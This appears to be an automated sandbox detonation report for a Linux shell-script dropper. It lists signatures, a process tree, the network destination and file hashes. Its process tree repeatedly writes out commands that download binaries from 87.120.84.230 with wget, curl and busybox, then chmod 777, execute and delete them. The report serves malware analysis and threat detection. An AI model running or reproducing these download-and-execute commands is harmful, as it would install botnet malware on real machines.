SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-10 01:00

Reported

2024-11-10 01:03

Platform

debian9-mipsel-20240729-en

Max time kernel

56s

Max time network

58s

Command Line

[/tmp/0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO N/A
N/A /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J N/A
N/A /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv N/A
N/A /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 N/A
N/A /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt N/A
N/A /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV N/A
N/A /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B N/A
N/A /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc N/A
N/A /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR N/A
N/A /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 N/A
N/A /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y N/A
N/A /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF N/A
N/A /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl N/A
N/A /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B /usr/bin/curl N/A
File opened for modification /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO /usr/bin/curl N/A
File opened for modification /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J /usr/bin/curl N/A
File opened for modification /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y /usr/bin/curl N/A
File opened for modification /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 /usr/bin/curl N/A
File opened for modification /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF /usr/bin/curl N/A
File opened for modification /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 /usr/bin/curl N/A
File opened for modification /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug /usr/bin/curl N/A
File opened for modification /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc /usr/bin/curl N/A
File opened for modification /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt /usr/bin/curl N/A
File opened for modification /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV /usr/bin/curl N/A
File opened for modification /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl /usr/bin/curl N/A
File opened for modification /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR /usr/bin/curl N/A
File opened for modification /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv /usr/bin/curl N/A

Processes

/tmp/0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh

[/tmp/0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/chmod

[chmod 777 d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO

[./d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/rm

[rm d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/usr/bin/wget

[wget http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/chmod

[chmod 777 b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J

[./b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/rm

[rm b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/usr/bin/wget

[wget http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/chmod

[chmod 777 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv

[./V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/rm

[rm V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/usr/bin/wget

[wget http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/chmod

[chmod 777 trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3

[./trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/rm

[rm trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/usr/bin/wget

[wget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/chmod

[chmod 777 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt

[./qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/rm

[rm qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/usr/bin/wget

[wget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/chmod

[chmod 777 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV

[./6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/rm

[rm 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/usr/bin/wget

[wget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/chmod

[chmod 777 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B

[./z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/rm

[rm z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/usr/bin/wget

[wget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/chmod

[chmod 777 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc

[./qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/rm

[rm qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/usr/bin/wget

[wget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/chmod

[chmod 777 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR

[./619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/rm

[rm 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/usr/bin/wget

[wget http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/chmod

[chmod 777 pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5

[./pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/rm

[rm pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/usr/bin/wget

[wget http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/chmod

[chmod 777 wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y

[./wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/rm

[rm wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/usr/bin/wget

[wget http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/bin/chmod

[chmod 777 mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF

[./mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/bin/rm

[rm mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/usr/bin/wget

[wget http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/bin/chmod

[chmod 777 hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl

[./hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/bin/rm

[rm hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/usr/bin/wget

[wget http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/bin/chmod

[chmod 777 nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug

[./nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/bin/rm

[rm nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/usr/bin/wget

[wget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/chmod

[chmod 777 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt

[./qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/rm

[rm qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/usr/bin/wget

[wget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/chmod

[chmod 777 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV

[./6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/rm

[rm 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/usr/bin/wget

[wget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/chmod

[chmod 777 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B

[./z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/rm

[rm z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/usr/bin/wget

[wget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/chmod

[chmod 777 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc

[./qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/rm

[rm qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/usr/bin/wget

[wget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/chmod

[chmod 777 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR

[./619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/rm

[rm 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/usr/bin/wget

[wget http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/chmod

[chmod 777 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv

[./V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/rm

[rm V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/usr/bin/wget

[wget http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/chmod

[chmod 777 trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3

[./trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/rm

[rm trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/usr/bin/wget

[wget http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/chmod

[chmod 777 pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5

[./pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/rm

[rm pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/usr/bin/wget

[wget http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/chmod

[chmod 777 wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y

[./wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/rm

[rm wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/usr/bin/wget

[wget http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/bin/chmod

[chmod 777 mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF

[./mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/bin/rm

[rm mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/usr/bin/wget

[wget http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/bin/chmod

[chmod 777 hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl

[./hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/bin/rm

[rm hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/usr/bin/wget

[wget http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/bin/chmod

[chmod 777 nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug

[./nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/bin/rm

[rm nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/usr/bin/wget

[wget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/chmod

[chmod 777 d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO

[./d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/rm

[rm d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/usr/bin/wget

[wget http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/chmod

[chmod 777 b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J

[./b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/rm

[rm b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

Network

Country Destination Domain Proto
DE 87.120.84.230:80 87.120.84.230 tcp

Files

/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97